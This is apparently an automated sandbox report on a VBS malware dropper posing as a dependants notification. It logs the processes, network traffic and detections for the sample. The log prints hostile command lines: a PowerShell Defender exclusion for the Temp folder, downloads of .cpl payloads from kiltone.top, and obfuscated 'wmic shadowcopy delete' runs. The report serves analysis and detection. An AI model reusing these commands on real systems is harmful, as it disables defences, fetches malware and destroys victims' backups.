Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ProcessId: 7716, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7716, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', ProcessId: 7804, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5900, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://kiltone.top/stelin/Gosjeufon.cplAvira URL Cloud: Label: malware
Source: https://kiltone.top/stelin/rwcla.cplAvira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\fjeljies.cplReversingLabs: Detection: 50%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
Source: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: fjeljies.cpl.13.dr
Source: Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.dr
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\wtr\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\System32\rundll32.exeJump to behavior

Networking

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: TELE-ASTeleAsiaLimitedHK TELE-ASTeleAsiaLimitedHK
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global trafficHTTP traffic detected: GET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1Host: www.oldmutual.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stelin/rwcla.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.oldmutual.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1Host: www.oldmutual.co.zaConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: www.oldmutual.co.za
Source: global trafficDNS traffic detected: DNS query: kiltone.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 8659Connection: closeDate: Thu, 19 Dec 2024 05:18:11 GMTLast-Modified: Wed, 18 Dec 2024 15:03:19 GMTx-amz-server-side-encryption: AES256Accept-Ranges: bytesServer: AmazonS3Content-Security-Policy: default-src 'self'; font-src 'self' data: https://use.typekit.net https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://tagmanager.google.com https://fonts.googleapis.com https://fonts.gstatic.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://services.ominsure.co.za https://embed.tawk.to https://salesiq.zoho.com https://css.zohostatic.com https://css.zohocdn.com/* https://css.zohocdn.com/salesiq/styles/fonts/cw/puvi/* https://css.zohocdn.com/salesiq/styles/fonts/cw/* https://css.zohocdn.com; style-src 'self' 'unsafe-inline' https://tagmanager.google.com https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://fonts.googleapis.com https://optimize.google.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://services.ominsure.co.za https://www.gstatic.com https://embed.tawk.to https://cdn.jsdelivr.net/* https://css.zohocdn.com https://css.zohostatic.com https://cdn.jsdelivr.net/* https://static.zohocdn.com; img-src 'self' data: https://p.typekit.net https://tawk.link https://tawk.link/* https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://t.co https://www.google.co.za https://www.google.com https://www.gstatic.com https://ssl.gstatic.com https://maps.gstatic.com https://maps.googleapis.com https://eu-images.contentstack.com https://images.contentstack.io https://i.ytimg.com https://www.google-analytics.com https://www.facebook.com https://stats.g.doubleclick.net https://px.ads.linkedin.com https://p.adsymptotic.com https://lh3.googleusercontent.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://optimize.google.com https://ws.sessioncam.com https://services.ominsure.co.za https://*.fls.doubleclick.net https://sp.analytics.yahoo.com https://embed.tawk.to https://embed.tawk.to https://salesiq.zoho.com https://salesiq.zoho https://salesiq.zohopublic.com https://css.zohostatic.com https://css.zohostatic.com/* https://css.zohocdn.com https://analytics.twitter.com/1/i/* https://geo-tracker.trinadsp.co.za/* https://s2s.oldmutual.co.za https://track.adform.
Source: cert9.db.32.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.32.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cert9.db.32.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: svchost.exe, 0000000E.00000002.2703518448.000002794C600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: cert9.db.32.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.32.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.32.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.32.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: svchost.exe, 0000000E.00000002.2704121247.000002794C6E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000E.00000002.2701311776.00000279472B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2702160116.0000027947B02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2703895247.000002794C666000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2703657573.000002794C62C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2123615600.000002794C812000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2704087086.000002794C6D5000.00000004.00000020.00020000.00000000.sdmp, edb.log.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000000E.00000002.2703895247.000002794C68D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
Source: edb.log.14.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: cert9.db.32.drString found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.32.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: cert9.db.32.drString found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.32.drString found in binary or memory: http://x1.i.lencr.org/0
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://MD8.mozilla.org/1/m
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://account.bellmedia.c
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://allegro.pl/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://bugzilla.mo
Source: prefs.js.32.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: rundll32.exe, 00000015.00000002.2161641994.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, fjeljies.cpl.13.drString found in binary or memory: https://digify.com/a/#/access/login
Source: fjeljies.cpl.13.drString found in binary or memory: https://digify.com/a/#/access/logincmd
Source: edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 0000000E.00000003.1487710421.000002794C810000.00000004.00000800.00020000.00000000.sdmp, edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: extensions.json.32.drString found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: prefs.js.32.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: fjeljies.cpl.13.drString found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl
Source: cmd.exe, 0000001B.00000002.1770145202.0000000002EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
Source: wscript.exe, 00000000.00000002.1574200760.0000011AB8065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1575418983.0000011AB9DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kiltone.top/stelin/rwcla.
Source: wscript.exe, 00000000.00000002.1573963489.0000011AB7E94000.00000004.00000020.00020000.00000000.sdmp, NOTIFICATION_OF_DEPENDANTS.vbsString found in binary or memory: https://kiltone.top/stelin/rwcla.cpl
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://login.live.com
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://login.microsoftonline.com
Source: extensions.json.32.drString found in binary or memory: https://screenshots.firefox.com/
Source: places.sqlite.32.drString found in binary or memory: https://support.mozilla.org
Source: places.sqlite.32.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: favicons.sqlite.32.drString found in binary or memory: https://support.mozilla.org/products/firefox
Source: places.sqlite.32.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://twitter.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://weibo.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.aliexpress.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.amazon.ca/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.amazon.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.amazon.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.amazon.de/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.amazon.fr/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.avito.ru/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.baidu.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.bbc.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.ctrip.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.ebay.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.ebay.de/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.google.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.google.com/complete/
Source: data.safe.bin.32.drString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=&
Source: data.safe.bin.32.drString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=&metrics#search.engine.default.verified
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.ifeng.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.iqiyi.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.leboncoin.fr/
Source: places.sqlite.32.drString found in binary or memory: https://www.mozilla.org
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.mozilla.org/
Source: favicons.sqlite.32.drString found in binary or memory: https://www.mozilla.org/about/
Source: places.sqlite.32.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: favicons.sqlite.32.drString found in binary or memory: https://www.mozilla.org/contribute/
Source: places.sqlite.32.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: favicons.sqlite.32.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: places.sqlite.32.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.sqlite.32.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: favicons.sqlite.32.drString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: favicons.sqlite.32.drString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: places.sqlite.32.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: places.sqlite.32.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.msn.com
Source: chromecache_584.15.drString found in binary or memory: https://www.oldmutual.co.za/news/internet-explorer-support
Source: wscript.exe, wscript.exe, 00000000.00000002.1574200760.0000011AB8065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1575418983.0000011AB9DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1573963489.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1572415857.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.oldmutual.co.za/v3/assets/blt0
Source: wscript.exe, 00000000.00000003.1572415857.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp, NOTIFICATION_OF_DEPENDANTS.vbsString found in binary or memory: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.olx.pl/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.reddit.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.wykop.pl/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.youtube.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.drString found in binary or memory: https://www.zhihu.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.9:49725 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete
